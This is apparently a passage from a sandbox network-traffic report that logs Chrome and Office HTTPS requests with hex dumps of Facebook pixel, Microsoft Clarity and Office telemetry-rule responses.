                                                                                                                                    Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                    2024-11-05 08:03:24 UTC1500INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                    Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                    2024-11-05 08:03:24 UTC14884INData Raw: 75 72 6e 21 30 7d 28 29 29 72 65 74 75 72 6e 3b 76 61 72 20 67 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3a 22 40 40 69 74 65 72 61 74 6f 72 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 61 21 3d 3d 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63
                                                                                                                                    Data Ascii: urn!0}())return;var g=typeof Symbol==="function"&&typeof (typeof Symbol==="function"?Symbol.iterator:"@@iterator")==="symbol"?function(a){return typeof a}:function(a){return a&&typeof Symbol==="function"&&a.constructor===Symbol&&a!==(typeof Symbol==="func
                                                                                                                                    2024-11-05 08:03:24 UTC1500INData Raw: 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3a 22 40 40 69 74 65 72 61 74 6f 72 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 61 21 3d 3d 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                    Data Ascii: =typeof Symbol==="function"&&typeof (typeof Symbol==="function"?Symbol.iterator:"@@iterator")==="symbol"?function(a){return typeof a}:function(a){return a&&typeof Symbol==="function"&&a.constructor===Symbol&&a!==(typeof Symbol==="function"?Symbol.prototyp
                                                                                                                                    2024-11-05 08:03:24 UTC14884INData Raw: 65 74 3b 61 3d 61 2e 70 69 78 65 6c 3b 72 65 74 75 72 6e 20 69 28 7b 65 78 74 72 61 63 74 6f 72 73 42 79 50 69 78 65 6c 73 3a 67 2c 66 62 71 49 6e 73 74 61 6e 63 65 3a 65 2c 70 69 78 65 6c 3a 61 2c 74 61 72 67 65 74 3a 62 7d 29 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 69 77 6c 70 61 72 61 6d 65 74 65 72 73 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 69 77 6c 70 61 72 61 6d 65 74 65 72 73 22 2c 65
                                                                                                                                    Data Ascii: et;a=a.pixel;return i({extractorsByPixels:g,fbqInstance:e,pixel:a,target:b})})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.iwlparameters");f.registerPlugin&&f.registerPlugin("fbevents.plugins.iwlparameters",e
                                                                                                                                    2024-11-05 08:03:24 UTC1500INData Raw: 65 6e 67 74 68 3e 30 3b 66 3d 6e 2e 6c 65 6e 67 74 68 3e 30 3b 69 66 28 6b 7c 7c 66 29 7b 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 28 22 66 62 65 76 65 6e 74 73 3a 65 6e 64 3a 75 6e 77 61 6e 74 65 64 44 61 74 61 50 72 6f 63 65 73 73 69 6e 67 22 2c 62 2e 69 64 29 3b 67 2e 6c 6f 67 55 73 65 72 45 72 72 6f 72 28 7b 74 79 70 65 3a 22 55 4e 57 41 4e 54 45 44 5f 43 55 53 54 4f 4d 5f 44 41 54 41 22 7d 29 3b 70 3d 7b 7d 3b 6b 26 26 28 70 2e 75 70 3d 6d 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 66 26 26 28 70 2e 72 70 3d 6e 2e 6a 6f 69 6e 28 22 2c 22 29 29 3b 72 65 74 75 72 6e 20 70 7d 7d 61 2e 70 65 72 66 6f 72 6d 61 6e 63 65 4d 61 72 6b 28 22 66 62 65 76 65 6e 74 73 3a 65 6e 64 3a 75 6e 77 61 6e 74 65 64 44 61 74 61 50 72 6f 63 65 73 73 69 6e 67 22 2c 62 2e
                                                                                                                                    Data Ascii: ength>0;f=n.length>0;if(k||f){a.performanceMark("fbevents:end:unwantedDataProcessing",b.id);g.logUserError({type:"UNWANTED_CUSTOM_DATA"});p={};k&&(p.up=m.join(","));f&&(p.rp=n.join(","));return p}}a.performanceMark("fbevents:end:unwantedDataProcessing",b.
                                                                                                                                    2024-11-05 08:03:25 UTC14884INData Raw: 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 2c 65 2e 65 78 70 6f 72 74 73 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 75 6e 77 61 6e 74 65 64 64 61 74 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d
                                                                                                                                    Data Ascii: xports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.unwanteddata");f.registerPlugin&&f.registerPlugin("fbevents.plugins.unwanteddata",e.exports);f.ensureModuleRegistered("fbevents.plugins.unwanteddata",function(){return e.exports}
                                                                                                                                    2024-11-05 08:03:25 UTC1500INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 48 28 62 2c 63 2c 64 2c 66 29 7b 76 61 72 20 67 3d 49 5b 62 2e 69 64 5d 3b 64 2e 63 73 5f 65 73 74 3d 21 30 3b 69 66 28 67 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 6e 28 67 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 72 79 7b 69 66 28 74 2e 69 73 4d 61 74 63 68 45 53 54 52 75 6c 65 28 67 2e 63 6f 6e 64 69 74 69 6f 6e 2c 63 29 29 7b 69 66 28 67 2e 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 6e 28 67 2e 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 73 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 69 66 28 63 21 3d 3d 70 2e 44 45 52 49 56 45 5f 45 56 45 4e 54 29 72 65 74 75 72 6e 3b 63 3d 61 28 7b 7d 2c 64 29 3b 76 61 72 20 68 3d 7b 65 76 65 6e 74 49 44 3a 66 7d 3b 67 2e 72 75 6c 65 5f 69 64
                                                                                                                                    Data Ascii: e}function H(b,c,d,f){var g=I[b.id];d.cs_est=!0;if(g==null)return;n(g,function(g){try{if(t.isMatchESTRule(g.condition,c)){if(g.transformations==null)return;n(g.transformations,function(c){if(c!==p.DERIVE_EVENT)return;c=a({},d);var h={eventID:f};g.rule_id
                                                                                                                                    2024-11-05 08:03:25 UTC14884INData Raw: 6e 64 3a 65 73 74 50 61 67 65 56 69 65 77 50 72 6f 63 65 73 73 69 6e 67 22 29 3b 72 65 74 75 72 6e 7b 63 73 5f 65 73 74 3a 21 30 2c 65 73 74 5f 73 6f 75 72 63 65 3a 69 7d 7d 72 65 74 75 72 6e 7b 7d 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 2c 65 2e 65 78 70 6f 72 74 73 29 3b
                                                                                                                                    Data Ascii: nd:estPageViewProcessing");return{cs_est:!0,est_source:i}}return{}})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.estruleengine");f.registerPlugin&&f.registerPlugin("fbevents.plugins.estruleengine",e.exports);
                                                                                                                                    2024-11-05 08:03:25 UTC2007INData Raw: 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69
                                                                                                                                    Data Ascii: Modules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.plugi


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    113192.168.2.44988813.107.246.454435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC417OUTGET /tag/mupsjrmw7f HTTP/1.1
                                                                                                                                    Host: www.clarity.ms
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: CLID=a7d61f4104e24a3ab7dd66c7c8abcd4a.20241105.20251105
                                                                                                                                    2024-11-05 08:03:24 UTC379INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: application/x-javascript
                                                                                                                                    Content-Length: 689
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                    Expires: -1
                                                                                                                                    Request-Context: appId=cid-v1:bdfb7149-d2ee-45f0-9a22-f0b1c5035608
                                                                                                                                    x-azure-ref: 20241105T080324Z-16547b76f7fkj7j4hC1DFW0a9g00000004x0000000002hhy
                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:24 UTC689INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 61 2c 72 2c 69 2c 74 2c 79 29 7b 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 28 29 7b 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 63 2e 67 69 66 22 7d 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 73 79 6e 63 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 73 79 6e 63 29 3b 69 66 28 61 5b 63 5d 2e 76 7c 7c 61 5b 63 5d 2e 74 29 72 65 74 75 72 6e 20 61 5b 63 5d 28 22 65 76 65 6e 74 22 2c 63 2c 22 64 75 70 2e 22 2b 69 2e 70 72 6f 6a 65 63 74 49 64 29 3b 61 5b 63 5d 2e 74 3d 21 30 2c 28 74 3d 6c 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 72 29 29 2e
                                                                                                                                    Data Ascii: !function(c,l,a,r,i,t,y){function sync(){(new Image).src="https://c.clarity.ms/c.gif"}"complete"==document.readyState?sync():window.addEventListener("load",sync);if(a[c].v||a[c].t)return a[c]("event",c,"dup."+i.projectId);a[c].t=!0,(t=l.createElement(r)).


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    114192.168.2.44988713.107.253.454435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC595OUTGET /s/0.7.53/clarity.js HTTP/1.1
                                                                                                                                    Host: www.clarity.ms
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: CLID=a7d61f4104e24a3ab7dd66c7c8abcd4a.20241105.20251105
                                                                                                                                    2024-11-05 08:03:24 UTC550INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: application/javascript;charset=utf-8
                                                                                                                                    Content-Length: 67020
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Last-Modified: Mon, 04 Nov 2024 16:45:38 GMT
                                                                                                                                    ETag: "0x8DCFCF01CE35FFD"
                                                                                                                                    x-ms-request-id: 1102a136-c01e-002b-5eda-2eae17000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    x-azure-ref: 20241105T080324Z-158dbd74bf48jc9phC1SN1a5vw00000001eg000000001dga
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    x-fd-int-roxy-purgeid: 51562430
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:24 UTC15834INData Raw: 2f 2a 20 63 6c 61 72 69 74 79 2d 6a 73 20 76 30 2e 37 2e 35 33 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 69 63 72 6f 73 6f 66 74 2f 63 6c 61 72 69 74 79 20 28 4c 69 63 65 6e 73 65 3a 20 4d 49 54 29 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 6e 75 6c 6c 2c 67 65 74 20 71 75 65 75 65 28 29 7b 72 65 74 75 72 6e 20 73 72 7d 2c 67 65 74 20 73 74 61 72 74 28 29 7b 72 65 74 75 72 6e 20 63 72 7d 2c 67 65 74 20 73 74 6f 70 28 29 7b 72 65 74 75 72 6e 20 6c 72 7d 2c 67 65 74 20 74 72 61 63 6b 28 29 7b 72 65 74 75 72 6e 20 61 72 7d 7d 29 2c 65 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 5f 5f 70 72 6f
                                                                                                                                    Data Ascii: /* clarity-js v0.7.53: https://github.com/microsoft/clarity (License: MIT) */!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__pro
                                                                                                                                    2024-11-05 08:03:24 UTC16384INData Raw: 2c 73 65 6c 65 63 74 6f 72 3a 6e 75 6c 6c 2c 68 61 73 68 3a 6e 75 6c 6c 2c 72 65 67 69 6f 6e 3a 6c 2c 6d 65 74 61 64 61 74 61 3a 7b 61 63 74 69 76 65 3a 21 30 2c 73 75 73 70 65 6e 64 3a 21 31 2c 70 72 69 76 61 63 79 3a 66 2c 70 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 2c 66 72 61 75 64 3a 64 2c 73 69 7a 65 3a 6e 75 6c 6c 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 61 3d 65 2e 64 61 74 61 2c 72 3d 65 2e 6d 65 74 61 64 61 74 61 2c 69 3d 72 2e 70 72 69 76 61 63 79 2c 6f 3d 61 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 2c 75 3d 61 2e 74 61 67 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 20 50 74 2e 69 6e 64 65 78 4f 66 28 75 29 3e 3d 30 3a 76 61 72 20 63 3d 6f 2e 74 79 70 65 2c 73 3d 22 22 2c
                                                                                                                                    Data Ascii: ,selector:null,hash:null,region:l,metadata:{active:!0,suspend:!1,privacy:f,position:null,fraud:d,size:null}},function(t,e,n){var a=e.data,r=e.metadata,i=r.privacy,o=a.attributes||{},u=a.tag.toUpperCase();switch(!0){case Pt.indexOf(u)>=0:var c=o.type,s="",
                                                                                                                                    2024-11-05 08:03:24 UTC16384INData Raw: 74 2e 61 76 61 69 6c 61 62 69 6c 69 74 79 29 2c 47 72 28 31 34 2c 74 2e 69 74 65 6d 43 6f 6e 64 69 74 69 6f 6e 29 2c 47 72 28 31 33 2c 74 2e 70 72 69 63 65 43 75 72 72 65 6e 63 79 29 2c 47 72 28 31 32 2c 74 2e 73 6b 75 29 2c 57 28 31 33 2c 5a 6e 28 74 2e 70 72 69 63 65 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 62 72 61 6e 64 22 3a 47 72 28 36 2c 74 2e 6e 61 6d 65 29 7d 6e 75 6c 6c 21 3d 3d 72 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 26 26 4b 6e 28 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5a 6e 28 74 2c 65 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 31 29 2c 6e 75 6c 6c 21 3d 3d 74 29 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 74 29 7b 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 20 4d 61 74 68 2e 72 6f 75 6e 64
                                                                                                                                    Data Ascii: t.availability),Gr(14,t.itemCondition),Gr(13,t.priceCurrency),Gr(12,t.sku),W(13,Zn(t.price));break;case"brand":Gr(6,t.name)}null!==r&&"object"==typeof r&&Kn(r)}}function Zn(t,e){if(void 0===e&&(e=1),null!==t)switch(typeof t){case"number":return Math.round
                                                                                                                                    2024-11-05 08:03:24 UTC16384INData Raw: 34 31 3a 53 74 26 26 28 65 2e 70 75 73 68 28 53 74 2e 69 64 29 2c 65 2e 70 75 73 68 28 53 74 2e 74 61 72 67 65 74 29 2c 65 2e 70 75 73 68 28 53 74 2e 63 68 65 63 6b 73 75 6d 29 2c 73 72 28 65 2c 21 31 29 29 7d 72 65 74 75 72 6e 5b 32 5d 7d 29 29 7d 29 29 7d 76 61 72 20 62 72 2c 77 72 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 72 28 74 2c 65 2c 6e 2c 61 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 61 26 26 28 61 3d 6e 75 6c 6c 29 2c 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 6e 75 6c 6c 29 3b 76 61 72 20 69 3d 6e 3f 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 7c 22 29 2e 63 6f 6e 63 61 74 28 61 29 3a 22 22 3b 74 20 69 6e 20 77 72 26 26 77 72 5b 74 5d 2e 69 6e 64 65 78 4f 66 28 69 29 3e 3d 30 7c 7c 28 62
                                                                                                                                    Data Ascii: 41:St&&(e.push(St.id),e.push(St.target),e.push(St.checksum),sr(e,!1))}return[2]}))}))}var br,wr={};function kr(t,e,n,a,r){void 0===n&&(n=null),void 0===a&&(a=null),void 0===r&&(r=null);var i=n?"".concat(n,"|").concat(a):"";t in wr&&wr[t].indexOf(i)>=0||(b
                                                                                                                                    2024-11-05 08:03:24 UTC2034INData Raw: 6d 61 6e 63 65 45 76 65 6e 74 54 69 6d 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 26 26 28 69 6f 28 61 29 2c 47 72 28 33 37 2c 61 6f 28 29 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 61 79 6f 75 74 2d 73 68 69 66 74 22 3a 65 26 26 21 61 2e 68 61 64 52 65 63 65 6e 74 49 6e 70 75 74 26 26 50 28 39 2c 31 65 33 2a 61 2e 76 61 6c 75 65 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 6c 61 72 67 65 73 74 2d 63 6f 6e 74 65 6e 74 66 75 6c 2d 70 61 69 6e 74 22 3a 65 26 26 57 28 38 2c 61 2e 73 74 61 72 74 54 69 6d 65 29 7d 7d 7d 28 74 2e 67 65 74 45 6e 74 72 69 65 73 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 6f 28 74 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 72 65 74 75 72 6e 20
                                                                                                                                    Data Ascii: manceEventTiming.prototype&&(io(a),Gr(37,ao().toString()));break;case"layout-shift":e&&!a.hadRecentInput&&P(9,1e3*a.value);break;case"largest-contentful-paint":e&&W(8,a.startTime)}}}(t.getEntries())}function so(t){var e=document.createElement("a");return


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    115192.168.2.44989113.107.253.45443
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:24 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                    2024-11-05 08:03:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:24 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 470
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                    ETag: "0x8DC582BBB181F65"
                                                                                                                                    x-ms-request-id: 4bc251d2-601e-00ab-3370-2e66f4000000
                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                    x-azure-ref: 20241105T080324Z-157b9fd754frbrzghC1SN12cu4000000041g000000005nru
                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    2024-11-05 08:03:24 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
